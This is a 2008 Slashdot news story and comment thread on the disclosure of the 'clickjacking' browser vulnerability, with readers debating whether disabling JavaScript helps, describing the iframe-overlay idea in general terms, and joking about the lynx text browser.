Slashdot Log In
Alarm Raised For "Clickjacking" Browser Exploit
Posted by
timothy
on Thursday September 25, @04:19PM
Shipment Date writes "ZDNet's Zero Day blog has some new information on what looks like a scary new browser exploit/threat affecting all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash. The threat, called Clickjacking, was to be discussed at the OWASP conference but was nixed at the last minute at hte request of affected vendors. From the article: 'In a nutshell, it's when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'"
Related Stories
Firehose:Alarm Raised for 'Clickjacking' Browser Exploit by Anonymous Coward
[+]
Fixes Released (and More Promised) For "Clickjacking" Exploits 48 comments
An anonymous reader writes "As discussed previously on Slashdot, concern has been raised over a class of 'clickjacking' vulnerabilities which affect all major Web browsers. These exploits allow an attacker to place invisible or seemingly legit objects on a Web page that perform undesired actions when a user clicks on them. In recent developments, 'Guya' posted a scary proof-of-concept that hijacks Adobe Flash Player to spy on users with a webcam and/or microphone. In response, Adobe released an advisory with a temporary workaround, and stated that a future Player update will address the exploit. This prompted the original disclosers of the vulnerabilities to post a summary of the exploits. Additionally, Giorgio Maone, creator of the popular NoScript extension for Firefox and other Gecko-based browsers, released version 1.8.2.1 of NoScript, which adds 'ClearClick,' a feature that intercepts clicks made on invisible or otherwise obscured elements on a page. Although issues remain, there seems to be progress in addressing these security problems."
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
Full
Abbreviated
Hidden
Loading... please wait.
Hurray for us lynx users! (Score:5, Funny)
*crickets*
Reply to This
Re:Hurray for us lynx users! (Score:5, Informative)
Hmm, I'm able to use lynx to log into Gmail. Granted, I had to accept a million cookies and other things along the way.
Lynx Version 2.8.6rel.4 (15 Nov 2006)
libwww-FM 2.14, SSL-MM 1.4.1, GNUTLS 1.6.2, ncurses 5.6.20080308(wide)
Built on linux-gnu May 2 2007 08:54:50
Reply to This
Parent
Information (Score:5, Insightful)
Reply to This
Re:Information (Score:5, Funny)
It's very similar to the DNS issue from a couple of months back: It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.
Have a nice day.
Reply to This
Parent
Re:Information (Score:5, Informative)
It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)
Reply to This
Parent
Never gonna... (Score:5, Funny)
Reply to This
Re:Never gonna... (Score:5, Funny)
We're all going to end up seeing goatse.cx again.
yeah but now it will have Rick Astley playing in the background...
Reply to This
Parent
Summary wrong (Score:5, Informative)
The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'
The quote from the article says you can protect yourself by disabling scripting:
In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesnâ(TM)t give people much technical detail to go on, but itâ(TM)s the best we can do right now.
Reply to This
Re:Summary wrong (Score:5, Informative)
The first quote is also from the article, so it's not the summary's fault. The article is vague and self-contradictory, so I'm calling bullshit until and unless further details are given.
Reply to This
Parent
Re:Summary wrong (Score:5, Informative)
The zdnet article is pretty vague, but I think it refers to the problem detailed in this message from Michal Zalewski [whatwg.org]:
"A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items', 'click to add Bob as a friend', etc. It may then provide own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."
Disabling JavaScript won't prevent the attack. It will break some mitigations, though!
Reply to This
Parent
Re:Summary wrong (Score:5, Interesting)
FWIW, this isn't exactly a new idea. roc and I discussed it back in 2002 [mozilla.org].
I'm glad it's getting attention now, though. Any fix is likely to require changes to specs.
Reply to This
Parent
Re:Summary wrong (Score:5, Informative)
+1 for "vague and self-contradictory."
From TFA: "The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you." and then "The exploit requires DHTML." As far as I know, DHTML requires a client-side scripting language--the most popular of which (only?) is JavaScript.
Reply to This
Parent
Re:Summary wrong (Score:5, Informative)
the problem is actually in dhtml, but javascript makes the exploit 'much easier'
hence, the attack sites will all be using javascript, because it's easier than writing it entirely in dhtml just to score and extra 1 click from the guy who disabled javascript because he doesn't trust it.
BTW: in theory even sites like slashdot can be infected because the attack applies to all CSS coded sites. nice.
oh, BTW, is you have noscript installed, this vulnerability can only force clicks within the same domain, since cross site code is automatically disabled.. AFAIK the only way to disable CSS is to use obsolete browses like lynx.
Reply to This
Parent
Thank Jeebus! (Score:5, Funny)
Reply to This
Re:Thank Jeebus! (Score:5, Funny)
Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!
I don't know how things work for you, but saying that I just got clickjacked is only going to get me into more trouble, not less.
Reply to This
Parent
Bullshit? (Score:5, Insightful)
I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
Won't be losing any sleep over this one.
Reply to This
Re:Bullshit? (Score:5, Insightful)
Except you're wrong, but don't take my word for it (I run ha.ckers.org with RSnake), see what Adobe has to say.
http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html [adobe.com]
-id
Reply to This
Parent
Premature claim (Score:5, Interesting)
I didn't find that information in TFA or in any of the TFAs linked in TFA (here [adobe.com] here [ckers.org] here [blogspot.com] here [webadminblog.com]). Though it may be so; it sounds like this exploit makes use of the browser's access to the clipboard.
Elinks FTW!
Reply to This
OWASP (Score:5, Interesting)
Well, add OWASP to the list of security organizations with no integrity. It's clear they care about their sponsors, not their members.
Reply to This
One of these things is not like the other. (Score:5, Insightful)
Web browser, Web browser, Web browser, Web browser, and cross-platform method for running code delivered from untrusted sources.
From TFA:
One vendor is, unlike the others, mentioned by name. It happens to be the vendor that ships The One Thing That Is Not Like The Others.
Also from TFA:
and
"In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but itâ(TM)s the best we can do right now."
Now we're at a quandary. Your humble correspondent is at a loss to even speculate as to the nature of a technology that Ffirstly isn't Javashit, but which can conceivably be invoked by web content regardless of which web browser is in use, but lastly can be secured against by disabling hated plug-ins.
Reply to This
Re:One of these things is not like the other. (Score:5, Interesting)
> Now we're at a quandary. Your humble
> correspondent is at a loss to even speculate as
> to the nature of a technology that Ffirstly isn't
> Javashit, but which can conceivably be invoked by
> web content regardless of which web browser is in
> use, but lastly can be secured against by
> disabling hated plug-ins.
It's a Flash exploit. I found a proof-of-concept by clicking around TFA, and it promised that the Flash movie would take over my clipboard, forcing me to close the browser window. I'm on Firefox 3.0.2, and the "proof-of-concept" did nothing.
At least nothing obvious. I suppose I could have been rootkitted.
Reply to This
Parent
Scary? (Score:5, Insightful)
I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model, since this would be great for clickfraud. Other than that, a website could bounce you to another page on their site that you didn't intend to go to, and possibly overwhelm your browser & bandwidth with a redirect loop. I can see a hint of an issue in the way frames might be used with this exploit and 3rd-party sites (as noted in the article), but that seems to be a bit of a stretch since the original site would still be sending someone away from their site in another redirect. Plenty of sites who make the choice to be annoying already make you go through a little effort to break out of their frames when you go to an external site from one of their links, it's not the end of the world.
I'd like to hear other folks' ideas on ways this may be used for an exploit that could do damage to anything other than Google's bottom-line. Until I hear a more compelling one, this exploit doesn't strike me as being the least bit "scary". A "small potential nuisance" might be a more apt description, since it would be fairly simple for end users to just ignore its effects.
Reply to This
I've seen this as a bug (Score:5, Interesting)
I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlayed on each other. It's not clear which one would be activated until you click. If someone intentionally did this AND obscured the object they wanted the victim to click, and made the other object more attractive, people might be doing such clicking. This could be easily done with CSS on one page, but there's not advantage since both links are just part of the same page. I don't think frames would do this. However, IFRAMES might do this on a cross "page" basis. The perp makes an attractive link that overlays over an iframe that is loaded from another page, so the act of clicking gets the victim to effective click on the other page. This loads something else in the iframe, but from the perpective of that other web site, it was a click on their page (based on the referer value). The simple exploit would get people to click on an ad, and it would not be visible to the ad vendor which page was doing the exploit.
Reply to This
Re:Konqueror? (Score:5, Funny)
The summary clearly states that only lynx is not affected. It's pretty obvious what's going on here: the exploit is a nefarious plot to make everyone switch over to lynx, thereby crippling the non-text-based porn industry.
Reply to This
Parent
Re:Konqueror? (Score:5, Funny)
Reply to This
Parent